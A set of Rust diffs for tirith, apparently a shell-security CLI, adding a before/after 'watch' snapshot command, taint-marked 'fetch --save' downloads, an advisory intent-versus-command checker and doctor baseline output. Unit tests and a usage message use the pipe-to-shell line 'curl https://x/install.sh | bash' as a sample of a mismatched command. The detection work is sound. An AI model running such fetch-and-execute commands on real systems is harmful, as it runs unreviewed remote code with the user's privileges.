@@ -261,8 +265,9 @@ pub fn watch(command: &[String], paths: &[String], with_net_hints: bool, json: b
             return 2;
         }
     };
+    let interrupted = WATCH_INTERRUPTED.load(std::sync::atomic::Ordering::Relaxed);
 
-    // --- AFTER: re-inventory + re-capture ---
+    // --- AFTER: re-inventory + re-capture (ALWAYS, even after an interrupt) ---
     let files_after = inventory_files(&snapshot_paths);
     let rt_after = checkpoint::capture_runtime_state(&home);
 
@@ -306,6 +311,7 @@ pub fn watch(command: &[String], paths: &[String], with_net_hints: bool, json: b
             with_net_hints,
             &findings,
             action,
+            interrupted,
         );
     } else {
         print_watch_human(
@@ -317,6 +323,7 @@ pub fn watch(command: &[String], paths: &[String], with_net_hints: bool, json: b
             &post_run_state,
             with_net_hints,
             &findings,
+            interrupted,
         );
     }
 
@@ -344,6 +351,19 @@ fn home_dir() -> Option<PathBuf> {
 /// behave as the user typed them. Returns the child's exit code (128 if killed
 /// by a signal with no code). The command runs with tirith's full privileges —
 /// this is NOT isolation.
+///
+/// F1: on Unix the child is placed in its OWN process group (`setpgid(0,0)` via
+/// `pre_exec`). Without this the child shares tirith's process group, so a
+/// terminal `Ctrl-C` (SIGINT) is delivered to the WHOLE group — killing tirith
+/// before it can run the AFTER snapshot + diff. A half-finished installer that
+/// wrote a `.zshrc` persistence line then got interrupted would produce NO
+/// `PostRunShellRcModified` finding. With the child in its own group, SIGINT
+/// goes to the child only; tirith's installed SIGINT handler (see
+/// [`install_watch_sigint_handler`]) merely notes the interrupt, and the caller
+/// ALWAYS runs the after-snapshot + diff once `status()` returns. The child
+/// still observes the interrupt (the terminal also signals the foreground group,
+/// and an interactive child reads it), so this does not swallow the user's
+/// Ctrl-C — it only keeps tirith alive long enough to report.
 fn run_command(command_str: &str) -> std::io::Result<i32> {
     use std::process::Command;
     let mut cmd = if cfg!(windows) {
@@ -356,9 +376,53 @@ fn run_command(command_str: &str) -> std::io::Result<i32> {
         c.arg("-c").arg(command_str);
         c
     };
+    #[cfg(unix)]
+    {
+        use std::os::unix::process::CommandExt;
+        // SAFETY: `setpgid` is async-signal-safe and the only call made in the
+        // forked child before exec. Placing the child in its own process group
+        // (pgid = its own pid) keeps a terminal SIGINT from also killing tirith.
+        unsafe {
+            cmd.pre_exec(|| {
+                if libc::setpgid(0, 0) != 0 {
+                    return Err(std::io::Error::last_os_error());
+                }
+                Ok(())
+            });
+        }
+    }
     let status = cmd.status()?;
     Ok(status.code().unwrap_or(128))
 }
+
+// ─── SIGINT handling (F1) ────────────────────────────────────────────────────
+
+/// Set by the watch SIGINT handler so the run path can note that the command was
+/// interrupted and still report an honest (possibly incomplete) diff.
+static WATCH_INTERRUPTED: std::sync::atomic::AtomicBool = std::sync::atomic::AtomicBool::new(false);
+
+/// Install a SIGINT handler that flips [`WATCH_INTERRUPTED`] instead of letting
+/// the default action terminate tirith. The child runs in its own process group
+/// (see [`run_command`]), so the child still takes the terminal's SIGINT; this
+/// handler only keeps the PARENT (tirith) alive so it can run the after-snapshot
+/// and diff. Uses `libc::signal` directly (the handler does one atomic store,
+/// which is async-signal-safe).
+#[cfg(unix)]
+fn install_watch_sigint_handler() {
+    extern "C" fn handle(_sig: libc::c_int) {
+        WATCH_INTERRUPTED.store(true, std::sync::atomic::Ordering::Relaxed);
+    }
+    // SAFETY: `handle` only performs an atomic store, which is
+    // async-signal-safe. Registering a SIGINT handler is sound.
+    unsafe {
+        libc::signal(libc::SIGINT, handle as *const () as libc::sighandler_t);
+    }
+}
+
+/// On non-Unix, Ctrl-C uses the default behavior. `watch` still runs the diff
+/// on a normal child exit; the process-group nuance is Unix-only.
+#[cfg(not(unix))]
+fn install_watch_sigint_handler() {}
 
 /// Inventory files under the given roots as a `path -> mtime` map, capped to
 /// keep the before/after snapshot cheap. Symlinks are recorded by their own
@@ -479,10 +543,19 @@ fn print_watch_human(
     state: &PostRunState,
     with_net_hints: bool,
     findings: &[Finding],
+    interrupted: bool,
 ) {
     let s = tirith_core::style::Stream::Stdout;
     println!("{} {command}", tirith_core::style::bold("watched:", s));
     println!("  exit code: {exit_code}");
+    if interrupted {
+        let note = tirith_core::style::yellow(
+            "interrupted (Ctrl-C): the command may not have finished, but the \
+             after-snapshot below still ran",
+            s,
+        );
+        println!("  {note}");
+    }
 
     print_list_section("new files", new_files, false);
     print_list_section("modified files", modified_files, false);
@@ -545,6 +618,7 @@ fn emit_watch_json(
     with_net_hints: bool,
     findings: &[Finding],
     action: Action,
+    interrupted: bool,
 ) {
     // `net_hints` is only meaningful (and present) when the experimental flag is
     // set; otherwise null so a consumer never reads an empty array as "no
@@ -565,6 +639,10 @@ fn emit_watch_json(
     let json_val = serde_json::json!({
         "command": command,
         "exit_code": exit_code,
+        // True when tirith caught a SIGINT during the run. The after-snapshot
+        // still ran, but the command may not have finished — a consumer should
+        // treat the diff as a lower bound, not a clean result.
+        "interrupted": interrupted,
         "new_files": new_files,
         "modified_files": modified_files,
         "shell_rc_modified": dedup_rc,

--- a/crates/tirith/src/cli/checkpoint.rs
+++ b/crates/tirith/src/cli/checkpoint.rs
@@ -1,4 +1,9 @@
-use tirith_core::checkpoint;
+use std::collections::BTreeSet;
+use std::path::{Path, PathBuf};
+use std::time::SystemTime;
+
+use tirith_core::checkpoint::{self, PostRunState};
+use tirith_core::verdict::{action_from_findings, Action, Finding};
 
 pub fn list_checkpoints(json: bool) -> i32 {
     match checkpoint::list() {
@@ -195,4 +200,385 @@ fn format_bytes(bytes: u64) -> String {
     } else {
         format!("{:.1} GiB", bytes as f64 / (1024.0 * 1024.0 * 1024.0))
     }
+}
+
+/// `tirith watch -- <cmd>` — snapshot → run → snapshot → diff (M10 ch2).
+///
+/// Snapshots the working directory (plus any `--paths`) and the runtime state
+/// (env-var names, `$PATH`, shell-rc hashes) BEFORE running the command, runs
+/// it, then re-snapshots and reports: new files, modified files, `$PATH`
+/// additions, and shell-rc modifications. A shell-rc file changed during the run
+/// fires the High `PostRunShellRcModified` finding.
+///
+/// This is observability AFTER the fact — it does NOT sandbox, isolate, or gate
+/// the command, which runs with the user's full privileges. The exit code is the
+/// CHILD command's exit code (so `tirith watch -- false` exits 1), except for a
+/// usage error (2) or a spawn failure (2). Findings are reported but do NOT
+/// override the child's exit code — `watch` is a lens, not a gate.
+///
+/// `with_net_hints` opts into an EXPERIMENTAL, best-effort domain-hint heuristic
+/// (resolver-cache mtime delta). It may miss QUIC/UDP/direct-IP entirely and is
+/// not a network monitor or a security boundary.
+pub fn watch(command: &[String], paths: &[String], with_net_hints: bool, json: bool) -> i32 {
+    let command_str = command.join(" ");
+    if command_str.trim().is_empty() {
+        eprintln!(
+            "tirith watch: no command given \
+             (usage: tirith watch -- npm install <pkg>)"
+        );
+        return 2;
+    }
+
+    let cwd = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
+    let home = match home_dir() {
+        Some(h) => h,
+        None => {
+            eprintln!("tirith watch: cannot resolve home directory; shell-rc diff unavailable");
+            cwd.clone()
+        }
+    };
+
+    // The set of file-content roots to snapshot: cwd plus any user-given paths.
+    // We deliberately cap to these — never walk all of $HOME (perf + privacy).
+    let mut snapshot_paths: Vec<String> = vec![cwd.to_string_lossy().into_owned()];
+    snapshot_paths.extend(paths.iter().cloned());
+
+    // --- BEFORE: file inventory + runtime state ---
+    let files_before = inventory_files(&snapshot_paths);
+    let rt_before = checkpoint::capture_runtime_state(&home);
+    let net_before = if with_net_hints {
+        Some(net_hint_sources(&home))
+    } else {
+        None
+    };
+
+    // --- RUN the command with the user's full privileges (no isolation) ---
+    let run_status = run_command(&command_str);
+    let exit_code = match run_status {
+        Ok(code) => code,
+        Err(e) => {
+            eprintln!("tirith watch: failed to run command: {e}");
+            return 2;
+        }
+    };
+
+    // --- AFTER: re-inventory + re-capture ---
+    let files_after = inventory_files(&snapshot_paths);
+    let rt_after = checkpoint::capture_runtime_state(&home);
+
+    let (mut post_run_state, modified_rc) = checkpoint::diff_runtime_state(&rt_before, &rt_after);
+
+    if let Some(before_sources) = net_before {
+        post_run_state.domains_contacted = net_hints_changed(&before_sources, &home);
+    }
+
+    // New / modified files from the before/after inventory.
+    let new_files: Vec<String> = files_after
+        .keys()
+        .filter(|p| !files_before.contains_key(*p))
+        .cloned()
+        .collect();
+    let mut new_files = new_files;
+    new_files.sort();
+
+    let mut modified_files: Vec<String> = files_after
+        .iter()
+        .filter_map(|(p, mtime_after)| {
+            files_before
+                .get(p)
+                .filter(|mtime_before| *mtime_before != mtime_after)
+                .map(|_| p.clone())
+        })
+        .collect();
+    modified_files.sort();
+
+    let findings = checkpoint::findings_for_modified_rc(&modified_rc);
+    let action = action_from_findings(&findings);
+
+    if json {
+        emit_watch_json(
+            &command_str,
+            exit_code,
+            &new_files,
+            &modified_files,
+            &modified_rc,
+            &post_run_state,
+            with_net_hints,
+            &findings,
+            action,
+        );
+    } else {
+        print_watch_human(
+            &command_str,
+            exit_code,
+            &new_files,
+            &modified_files,
+            &modified_rc,
+            &post_run_state,
+            with_net_hints,
+            &findings,
+        );
+    }
+
+    // `watch` reports; it does not gate. Surface the child's exit code so the
+    // command's success/failure is preserved for scripts.
+    exit_code
+}
+
+/// Resolve the user's home directory without mutating env. Mirrors the
+/// resolution `tirith_core::policy` uses; falls back to `$HOME` / `%USERPROFILE%`.
+fn home_dir() -> Option<PathBuf> {
+    #[cfg(unix)]
+    {
+        std::env::var_os("HOME").map(PathBuf::from)
+    }
+    #[cfg(not(unix))]
+    {
+        std::env::var_os("USERPROFILE")
+            .or_else(|| std::env::var_os("HOME"))
+            .map(PathBuf::from)
+    }
+}
+
+/// Run the watched command through the platform shell so pipelines / redirects
+/// behave as the user typed them. Returns the child's exit code (128 if killed
+/// by a signal with no code). The command runs with tirith's full privileges —
+/// this is NOT isolation.
+fn run_command(command_str: &str) -> std::io::Result<i32> {
+    use std::process::Command;
+    let mut cmd = if cfg!(windows) {
+        let mut c = Command::new("cmd");
+        c.arg("/C").arg(command_str);
+        c
+    } else {
+        let shell = std::env::var("SHELL").unwrap_or_else(|_| "/bin/sh".to_string());
+        let mut c = Command::new(shell);
+        c.arg("-c").arg(command_str);
+        c
+    };
+    let status = cmd.status()?;
+    Ok(status.code().unwrap_or(128))
+}
+
+/// Inventory files under the given roots as a `path -> mtime` map, capped to
+/// keep the before/after snapshot cheap. Symlinks are recorded by their own
+/// metadata (not followed). Hidden dirs (`.git`, …) are skipped, matching the
+/// shipping checkpoint walker's behavior.
+fn inventory_files(roots: &[String]) -> std::collections::BTreeMap<String, SystemTime> {
+    const MAX_FILES: usize = 100_000;
+    let mut out = std::collections::BTreeMap::new();
+    for root in roots {
+        let path = Path::new(root);
+        if path.is_file() {
+            if let Some(mtime) = file_mtime(path) {
+                out.insert(path.to_string_lossy().into_owned(), mtime);
+            }
+        } else if path.is_dir() {
+            inventory_dir(path, &mut out, MAX_FILES);
+        }
+    }
+    out
+}
+
+fn inventory_dir(
+    dir: &Path,
+    out: &mut std::collections::BTreeMap<String, SystemTime>,
+    max_files: usize,
+) {
+    if out.len() >= max_files {
+        return;
+    }
+    let entries = match std::fs::read_dir(dir) {
+        Ok(e) => e,
+        Err(_) => return,
+    };
+    for entry in entries.flatten() {
+        if out.len() >= max_files {
+            break;
+        }
+        let p = entry.path();
+        let meta = match p.symlink_metadata() {
+            Ok(m) => m,
+            Err(_) => continue,
+        };
+        if meta.file_type().is_symlink() {
+            // Record the link itself; do not follow (avoids escaping the tree).
+            if let Ok(mt) = meta.modified() {
+                out.insert(p.to_string_lossy().into_owned(), mt);
+            }
+            continue;
+        }
+        if meta.is_file() {
+            if let Ok(mt) = meta.modified() {
+                out.insert(p.to_string_lossy().into_owned(), mt);
+            }
+        } else if meta.is_dir() {
+            // Skip dotdirs (e.g. .git) — they dominate the count and are rarely
+            // the point of a watch.
+            let is_dot = p
+                .file_name()
+                .and_then(|n| n.to_str())
+                .map(|n| n.starts_with('.'))
+                .unwrap_or(false);
+            if !is_dot {
+                inventory_dir(&p, out, max_files);
+            }
+        }
+    }
+}
+
+fn file_mtime(path: &Path) -> Option<SystemTime> {
+    path.metadata().ok().and_then(|m| m.modified().ok())
+}
+
+/// EXPERIMENTAL best-effort network-hint sources: resolver-cache / log files
+/// whose mtime changing across the run *might* indicate DNS activity. This is
+/// the candidate-source list; [`net_hints_changed`] re-stats them after the run.
+/// This is NOT a network monitor and misses QUIC/UDP/direct-IP entirely.
+fn net_hint_sources(home: &Path) -> std::collections::BTreeMap<String, Option<SystemTime>> {
+    let mut candidates: Vec<PathBuf> = vec![
+        PathBuf::from("/var/log/system.log"),
+        PathBuf::from("/var/log/syslog"),
+    ];
+    candidates.push(home.join(".cache/mDNSResponder"));
+    let mut out = std::collections::BTreeMap::new();
+    for c in candidates {
+        let mtime = file_mtime(&c);
+        out.insert(c.to_string_lossy().into_owned(), mtime);
+    }
+    out
+}
+
+/// Re-stat the candidate sources and return the human-readable hint list for any
+/// whose mtime advanced during the run. Each entry is prefixed so the consumer
+/// cannot mistake it for an authoritative domain — these are mtime-delta hints,
+/// not resolved hostnames.
+fn net_hints_changed(
+    before: &std::collections::BTreeMap<String, Option<SystemTime>>,
+    home: &Path,
+) -> Vec<String> {
+    let after = net_hint_sources(home);
+    let mut hints = Vec::new();
+    for (src, after_mtime) in &after {
+        let before_mtime = before.get(src).cloned().flatten();
+        if after_mtime.is_some() && *after_mtime != before_mtime {
+            hints.push(format!("activity-near:{src}"));
+        }
+    }
+    hints.sort();
+    hints
+}
+
+#[allow(clippy::too_many_arguments)]
+fn print_watch_human(
+    command: &str,
+    exit_code: i32,
+    new_files: &[String],
+    modified_files: &[String],
+    modified_rc: &[String],
+    state: &PostRunState,
+    with_net_hints: bool,
+    findings: &[Finding],
+) {
+    let s = tirith_core::style::Stream::Stdout;
+    println!("{} {command}", tirith_core::style::bold("watched:", s));
+    println!("  exit code: {exit_code}");
+
+    print_list_section("new files", new_files, false);
+    print_list_section("modified files", modified_files, false);
+    print_list_section("$PATH additions", &state.path_dirs_added, false);
+    print_list_section("env vars added", &state.env_vars_added, false);
+
+    if !modified_rc.is_empty() {
+        let label = tirith_core::style::red("shell-rc modified", s);
+        println!("\n  {label}:");
+        for f in modified_rc {
+            println!("    {f}");
+        }
+    } else {
+        println!("\n  shell-rc modified: none");
+    }
+
+    if with_net_hints {
+        println!(
+            "\n  network hints (EXPERIMENTAL — best-effort only, may miss \
+             QUIC/UDP/direct-IP; NOT a network monitor, not a security boundary):"
+        );
+        if state.domains_contacted.is_empty() {
+            println!("    none observed (does NOT mean no network activity)");
+        } else {
+            for d in &state.domains_contacted {
+                println!("    {d}");
+            }
+        }
+    }
+
+    if !findings.is_empty() {
+        println!();
+        for f in findings {
+            let sev = tirith_core::style::severity_label(&f.severity, s);
+            println!("  [{sev}] {}", f.title);
+            println!("        {}", f.description);
+        }
+    }
+}
+
+fn print_list_section(label: &str, items: &[String], _force: bool) {
+    if items.is_empty() {
+        println!("\n  {label}: none");
+    } else {
+        println!("\n  {label} ({}):", items.len());
+        for i in items {
+            println!("    {i}");
+        }
+    }
+}
+
+#[allow(clippy::too_many_arguments)]
+fn emit_watch_json(
+    command: &str,
+    exit_code: i32,
+    new_files: &[String],
+    modified_files: &[String],
+    modified_rc: &[String],
+    state: &PostRunState,
+    with_net_hints: bool,
+    findings: &[Finding],
+    action: Action,
+) {
+    // `net_hints` is only meaningful (and present) when the experimental flag is
+    // set; otherwise null so a consumer never reads an empty array as "no
+    // network activity".
+    let net_hints = if with_net_hints {
+        serde_json::json!({
+            "experimental": true,
+            "best_effort": true,
+            "not_a_network_monitor": true,
+            "domains_contacted": state.domains_contacted,
+        })
+    } else {
+        serde_json::Value::Null
+    };
+
+    let dedup_rc: BTreeSet<&String> = modified_rc.iter().collect();
+
+    let json_val = serde_json::json!({
+        "command": command,
+        "exit_code": exit_code,
+        "new_files": new_files,
+        "modified_files": modified_files,
+        "shell_rc_modified": dedup_rc,
+        "path_dirs_added": state.path_dirs_added,
+        "env_vars_added": state.env_vars_added,
+        "net_hints": net_hints,
+        "action": action,
+        "findings": findings,
+    });
+    println!(
+        "{}",
+        serde_json::to_string_pretty(&json_val).unwrap_or_else(|e| {
+            eprintln!("tirith: watch: JSON serialization failed: {e}");
+            "{}".to_string()
+        })
+    );
 }

--- a/crates/tirith/src/cli/doctor.rs
+++ b/crates/tirith/src/cli/doctor.rs
@@ -648,6 +648,23 @@ struct DoctorInfo {
     /// Threat intelligence database status.
     #[serde(skip_serializing_if = "Option::is_none")]
     threat_db: Option<ThreatDbDoctorInfo>,
+    /// M10 ch5 — opt-in anomaly-baseline status. Always present (the baseline
+    /// is a core feature); `enabled` reflects `policy.baseline_enabled`.
+    baseline: BaselineDoctorInfo,
+}
+
+/// M10 ch5 — anomaly-baseline status for the doctor report. Surfaces whether
+/// the opt-in baseline is enabled, how many observations are in the window, and
+/// the early-baseline-mode flag (per risk #2: until ~30 observations the signal
+/// is not yet meaningful).
+#[derive(Debug, Clone, serde::Serialize)]
+struct BaselineDoctorInfo {
+    /// `policy.baseline_enabled` (opt-in; default false).
+    enabled: bool,
+    /// In-window observation count.
+    total_observations: usize,
+    /// `true` while `total_observations < EARLY_BASELINE_ENTRIES` (~30).
+    early_baseline_mode: bool,
 }
 
 #[derive(Debug, Clone, serde::Serialize)]
@@ -729,6 +746,7 @@ fn gather_info() -> DoctorInfo {
     let shadow_binaries = super::find_shadow_binaries();
     let detection_gaps = check_detection_gaps();
     let threat_db = gather_threat_db_info();
+    let baseline = gather_baseline_info();
 
     // Cached bash enter-mode delivery verdict (issue #111). Read-only here —
     // the cache is written by the self-test in `--simulate-enter` and by a
@@ -802,6 +820,19 @@ fn gather_info() -> DoctorInfo {
         shadow_binaries,
         detection_gaps,
         threat_db,
+        baseline,
+    }
+}
+
+/// M10 ch5 — read the anomaly-baseline status for the doctor report. Reads the
+/// store + the `policy.baseline_enabled` flag (no writes, no env mutation).
+fn gather_baseline_info() -> BaselineDoctorInfo {
+    let enabled = tirith_core::policy::Policy::discover_partial(None).baseline_enabled;
+    let total = tirith_core::baseline::entry_count();
+    BaselineDoctorInfo {
+        enabled,
+        total_observations: total,
+        early_baseline_mode: total < tirith_core::baseline::EARLY_BASELINE_ENTRIES,
     }
 }
 
@@ -2190,6 +2221,27 @@ fn print_human(info: &DoctorInfo) {
         }
     } else {
         println!("  threat DB:    not available");
+    }
+
+    // M10 ch5 — opt-in anomaly baseline. Always shown so the reader knows it
+    // exists and whether it is on. When on but sparse, call out early-baseline
+    // mode (per risk #2) so a flood of "first time" Info notes is understood as
+    // expected, not a bug.
+    if info.baseline.enabled {
+        if info.baseline.early_baseline_mode {
+            println!(
+                "  anomaly base: ON — early-baseline mode ({} obs; signals not yet meaningful until {})",
+                info.baseline.total_observations,
+                tirith_core::baseline::EARLY_BASELINE_ENTRIES,
+            );
+        } else {
+            println!(
+                "  anomaly base: ON ({} observations in window)",
+                info.baseline.total_observations
+            );
+        }
+    } else {
+        println!("  anomaly base: off (opt-in — enable with 'tirith baseline learn')");
     }
 
     if let Some(ref gaps) = info.detection_gaps {

--- a/crates/tirith/src/cli/fetch.rs
+++ b/crates/tirith/src/cli/fetch.rs
@@ -1,4 +1,92 @@
+use std::path::Path;
+
 use tirith_core::rules::cloaking;
+
+/// `tirith fetch --save <path> <url>` — download `url` to `path` (no execution)
+/// and mark `path` tainted in the local taint store. The downloaded file is
+/// kept at the known `path` YOU chose, so a later `bash <path>` / `source
+/// <path>` fires the engine's tainted-file rule. Unlike `tirith run`, nothing
+/// is executed and the file is not in a temp dir that gets cleaned up.
+pub fn save(url: &str, save_path: &str, sha256: Option<String>, json: bool) -> i32 {
+    let dest = Path::new(save_path);
+
+    let result = match tirith_core::runner::download_to_path(url, dest, sha256.as_deref()) {
+        Ok(r) => r,
+        Err(e) => {
+            if json {
+                let err = serde_json::json!({ "error": e });
+                super::write_json_stdout(&err, "tirith fetch --save: failed to write JSON output");
+            } else {
+                eprintln!("tirith fetch --save: {e}");
+            }
+            return 1;
+        }
+    };
+
+    // Mark the saved path tainted. The source is the (final, post-redirect) URL.
+    let mark = tirith_core::taint::mark_tainted(
+        dest,
+        "fetch --save",
+        Some(result.final_url.clone()),
+        None,
+    );
+
+    match mark {
+        Ok(entry) => {
+            if json {
+                #[derive(serde::Serialize)]
+                struct SaveOut<'a> {
+                    saved_path: String,
+                    sha256: &'a str,
+                    final_url: &'a str,
+                    size: u64,
+                    interpreter: &'a str,
+                    tainted: bool,
+                    taint_entry: &'a tirith_core::taint::TaintEntry,
+                }
+                let out = SaveOut {
+                    saved_path: entry.path.clone(),
+                    sha256: &result.sha256,
+                    final_url: &result.final_url,
+                    size: result.size,
+                    interpreter: &result.interpreter,
+                    tainted: true,
+                    taint_entry: &entry,
+                };
+                if !super::write_json_stdout(
+                    &out,
+                    "tirith fetch --save: failed to write JSON output",
+                ) {
+                    return 2;
+                }
+            } else {
+                println!(
+                    "Saved {} bytes to {} (SHA256: {})",
+                    result.size,
+                    save_path,
+                    tirith_core::receipt::short_hash(&result.sha256)
+                );
+                println!(
+                    "Marked TAINTED (origin: fetch --save, source: {}).",
+                    result.final_url
+                );
+                println!();
+                println!("This file was NOT executed. A later `bash {save_path}` or `source {save_path}`");
+                println!("will be flagged by tirith. Review it first; once you trust it:");
+                println!("  tirith taint clear {save_path}");
+            }
+            0
+        }
+        Err(e) => {
+            // The file downloaded but the taint mark failed — report honestly so
+            // the user knows the file is on disk but UNtracked.
+            eprintln!(
+                "tirith fetch --save: downloaded to {save_path} but failed to mark tainted: {e}"
+            );
+            1
+        }
+    }
+}
 
 pub fn run(url: &str, json: bool) -> i32 {
     match cloaking::check(url) {

--- a/crates/tirith/src/cli/intent.rs
+++ b/crates/tirith/src/cli/intent.rs
@@ -1,0 +1,227 @@
+//! `tirith intend "<intent>" -- "<command>"` — intent-vs-command heuristic
+//! (M10 ch4).
+//!
+//! Thin presenter over [`tirith_core::intent::analyze_intent`]. The heuristic is
+//! pure-Rust, no-LLM, and ADVISORY ONLY: it never blocks. It answers "does the
+//! thing you said you wanted match the thing this command actually does?" and
+//! flags Info-level mismatches (a high-impact command behavior the stated intent
+//! doesn't justify, e.g. piping a remote script to a shell when you only said
+//! you wanted to install a formatter).
+//!
+//! ## Exit codes (deliberately distinct from `tirith check`)
+//!
+//! `intend` is Info-level and NEVER blocks — but a non-zero exit on mismatch
+//! lets a script detect one without parsing output:
+//!
+//! - `0` — no mismatch (behavior justified by the intent, or no high-impact
+//!   behavior at all).
+//! - `1` — at least one mismatch was flagged. NOT a security block; the
+//!   command's real verdict comes from `tirith check`. Read: "the stated intent
+//!   did not justify what the command does; review it."
+//! - `2` — usage error (empty intent or empty command).
+//!
+//! `tirith check` uses 0/1/2/3 tied to verdict severity; `intend`'s codes are
+//! tied to whether a mismatch was found. The two surfaces are intentionally
+//! different.
+
+use std::io::Write;
+
+use tirith_core::intent::{self, IntentBehaviorReport};
+use tirith_core::tokenize::ShellType;
+
+/// Entry point. `intent` is the stated intent sentence; `command` is the
+/// command to analyze (already joined from the trailing var-args). `explain`
+/// opts into per-signal derivation; `json` selects machine output.
+pub fn run(intent: &str, command: &str, explain: bool, json: bool) -> i32 {
+    let intent = intent.trim();
+    let command = command.trim();
+
+    if intent.is_empty() {
+        eprintln!(
+            "tirith intend: no intent given (usage: tirith intend \"install a formatter\" -- \"<command>\")"
+        );
+        return 2;
+    }
+    if command.is_empty() {
+        eprintln!(
+            "tirith intend: no command given (usage: tirith intend \"<intent>\" -- \"curl https://x/install.sh | bash\")"
+        );
+        return 2;
+    }
+
+    let report = intent::analyze_intent(intent, command, ShellType::Posix, explain);
+
+    if json {
+        return emit_json(intent, command, &report, explain);
+    }
+
+    print_human(intent, command, &report, explain);
+    if report.has_mismatch() {
+        1
+    } else {
+        0
+    }
+}
+
+fn print_human(intent: &str, command: &str, report: &IntentBehaviorReport, explain: bool) {
+    if report.has_mismatch() {
+        println!(
+            "tirith intend: MISMATCH — the command does more than the stated intent justifies"
+        );
+    } else {
+        println!("tirith intend: OK — the command's behavior matches the stated intent");
+    }
+    println!("  intent:  {intent}");
+    println!("  command: {command}");
+    println!();
+
+    // Intent classification.
+    if report.intent_signals.is_empty() {
+        println!("  intent signals: none recognized");
+        println!(
+            "    note: no intent keyword matched. Every high-impact command behavior below is"
+        );
+        println!(
+            "          therefore treated as unjustified. Restate the intent if this is wrong."
+        );
+    } else {
+        let classes: Vec<&str> = report
+            .intent_signals
+            .iter()
+            .map(|s| s.class.as_str())
+            .collect();
+        println!("  intent signals: {}", classes.join(", "));
+    }
+
+    // Command behaviors.
+    if report.command_signals.is_empty() {
+        println!("  command signals: none (no high-impact behavior detected)");
+    } else {
+        println!("  command signals:");
+        for sig in &report.command_signals {
+            println!("    - {} ({})", sig.as_str(), sig.label());
+        }
+    }
+
+    // Mismatches.
+    if !report.mismatches.is_empty() {
+        println!();
+        println!("  mismatches:");
+        for m in &report.mismatches {
+            println!("    [{}] {}", m.signal.as_str(), m.reason);
+        }
+    }
+
+    // Per-signal derivation (only with --explain).
+    if explain && !report.derivation.is_empty() {
+        println!();
+        println!("  derivation (--explain):");
+        if report.intent_signals.is_empty() {
+            println!("    intent keywords matched: (none)");
+        } else {
+            for s in &report.intent_signals {
+                println!(
+                    "    intent keyword '{}' → class '{}'",
+                    s.matched_keyword,
+                    s.class.as_str()
+                );
+            }
+        }
+        for d in &report.derivation {
+            let marker = if d.mismatch { "MISMATCH" } else { "ok" };
+            println!("    [{marker}] {}", d.detail);
+        }
+    }
+
+    println!();
+    println!("  note: this is an ADVISORY heuristic — it is Info-level and NEVER blocks. Run");
+    println!("        `tirith check` for the command's actual security verdict.");
+}
+
+fn emit_json(intent: &str, command: &str, report: &IntentBehaviorReport, explain: bool) -> i32 {
+    #[derive(serde::Serialize)]
+    struct Out<'a> {
+        schema_version: u32,
+        intent: &'a str,
+        command: &'a str,
+        mismatch: bool,
+        #[serde(flatten)]
+        report: &'a IntentBehaviorReport,
+        /// Whether `--explain` derivation is included in this payload.
+        explain: bool,
+        /// Honesty-of-claim marker: this surface is advisory and never blocks.
+        analysis_kind: &'static str,
+    }
+    let out = Out {
+        schema_version: 1,
+        intent,
+        command,
+        mismatch: report.has_mismatch(),
+        report,
+        explain,
+        analysis_kind: "intent_vs_command_heuristic_advisory_not_a_block",
+    };
+    let mut stdout = std::io::stdout().lock();
+    if serde_json::to_writer_pretty(&mut stdout, &out).is_err() || writeln!(stdout).is_err() {
+        eprintln!("tirith intend: failed to write JSON output");
+        return 2;
+    }
+    if report.has_mismatch() {
+        1
+    } else {
+        0
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn empty_intent_exits_two() {
+        assert_eq!(run("   ", "ls", false, false), 2);
+    }
+
+    #[test]
+    fn empty_command_exits_two() {
+        assert_eq!(run("install a formatter", "   ", false, false), 2);
+    }
+
+    #[test]
+    fn mismatch_exits_one() {
+        let code = run(
+            "install a formatter",
+            "curl https://x/install.sh | bash",
+            false,
+            false,
+        );
+        assert_eq!(code, 1, "install-a-formatter vs curl|bash should mismatch");
+    }
+
+    #[test]
+    fn justified_exits_zero() {
+        let code = run(
+            "download and run an installer",
+            "curl https://x/install.sh | bash",
+            false,
+            false,
+        );
+        assert_eq!(code, 0, "download-and-run justifies curl|bash");
+    }
+
+    #[test]
+    fn clean_command_exits_zero() {
+        assert_eq!(run("list files", "ls -la", false, false), 0);
+    }
+
+    #[test]
+    fn mismatch_json_exits_one() {
+        let code = run(
+            "install a formatter",
+            "curl https://x/install.sh | bash",
+            true,
+            true,
+        );
+        assert_eq!(code, 1);
+    }
+}

--- a/crates/tirith/src/cli/mod.rs
+++ b/crates/tirith/src/cli/mod.rs
@@ -180,6 +180,7 @@ pub mod share;
 pub mod ssh;
 pub mod sudo;
 pub mod taint;
+pub mod temp_run;
 pub mod threatdb_cmd;
 pub mod trust;
 pub mod view;

--- a/crates/tirith/src/cli/mod.rs
+++ b/crates/tirith/src/cli/mod.rs
@@ -177,6 +177,7 @@ pub mod selfupdate;
 pub mod share;
 pub mod ssh;
 pub mod sudo;
+pub mod taint;
 pub mod threatdb_cmd;
 pub mod trust;
 pub mod view;

--- a/crates/tirith/src/cli/mod.rs
+++ b/crates/tirith/src/cli/mod.rs
@@ -168,6 +168,7 @@ pub mod paste;
 pub mod path;
 pub mod persistence;
 pub mod policy;
+pub mod preview;
 pub mod prompt_status;
 pub mod receipt;
 pub mod scan;

--- a/crates/tirith/src/cli/mod.rs
+++ b/crates/tirith/src/cli/mod.rs
@@ -155,6 +155,7 @@ pub mod hygiene;
 pub mod iac;
 pub mod init;
 pub mod install;
+pub mod intent;
 pub mod lab;
 pub mod last_trigger;
 pub mod license_cmd;

--- a/crates/tirith/src/cli/mod.rs
+++ b/crates/tirith/src/cli/mod.rs
@@ -131,6 +131,7 @@ pub fn confirm(prompt: &str, yes: bool) -> bool {
 pub mod agent;
 pub mod aliases;
 pub mod audit;
+pub mod baseline;
 #[cfg(unix)]
 pub mod bash_capability;
 pub mod check;

--- a/crates/tirith/src/cli/preview.rs
+++ b/crates/tirith/src/cli/preview.rs
@@ -34,9 +34,10 @@ use tirith_core::verdict::{action_from_findings, Action, Finding};
 ///
 /// Exit codes follow the standard tirith convention derived from the merged
 /// findings: 0 on Allow (no findings), 1 on Block (a High-severity finding
-/// fired — e.g. system-path / outside-repo / empty-var glob), 2 on Warn
-/// (Medium — `find -delete` / `rsync --delete` / symlinks). Info findings
-/// (large file count) do not change the exit code.
+/// fired — e.g. system-path / outside-repo / a present-and-empty `$VAR/` glob),
+/// 2 on Warn (Medium — `find -delete` / `rsync --delete` / symlinks). Info
